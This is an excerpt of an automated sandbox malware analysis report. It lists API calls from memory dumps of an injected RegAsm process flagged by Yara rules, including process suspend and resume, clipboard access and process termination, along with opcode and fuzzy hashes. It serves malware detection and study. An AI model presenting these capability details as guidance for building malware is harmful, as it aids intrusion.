                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                        • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                        • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                                        • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                        • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                        • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                        • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                        • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                        • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                        • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$CloseDataOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2058664381-0
                                                                                                                                        • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                        • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                        • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                        • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                                        • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseHandleOpenResume
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3614150671-0
                                                                                                                                        • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                        • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                                                                        • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                        • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                                        • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1999457699-0
                                                                                                                                        • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                        • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                                                                        • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                        • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                                                                        APIs
                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                        • String ID: MZ@
                                                                                                                                        • API String ID: 2325560087-2978689999
                                                                                                                                        • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                        • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                                        • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                        • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .
                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                        • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                        • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                                                                        • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                        • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .
                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                        • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                        • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                        • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                        • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                        • String ID: JD
                                                                                                                                        • API String ID: 1084509184-2669065882
                                                                                                                                        • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                        • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                                                        • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                        • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                                                        • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                        • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                                                        • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                        • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                                                        • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                                                                                                        • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                                                        • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1661935332-0
                                                                                                                                        • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                        • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                                                        • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                        • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                                                        APIs
                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                        • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                        • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                                                                                                        • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                        • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                                                                                                                        APIs
                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                        • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                        • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                                                                                                                                        • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                        • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                        • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                                                        • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                                                                                                                        • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                                                        • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                        • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                        • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                                                        • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                        • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2692324296-0
                                                                                                                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                        • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                        • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                        • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                        • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                                                        • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                        • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                        • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                        • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                                                        • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                        • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                                                        APIs
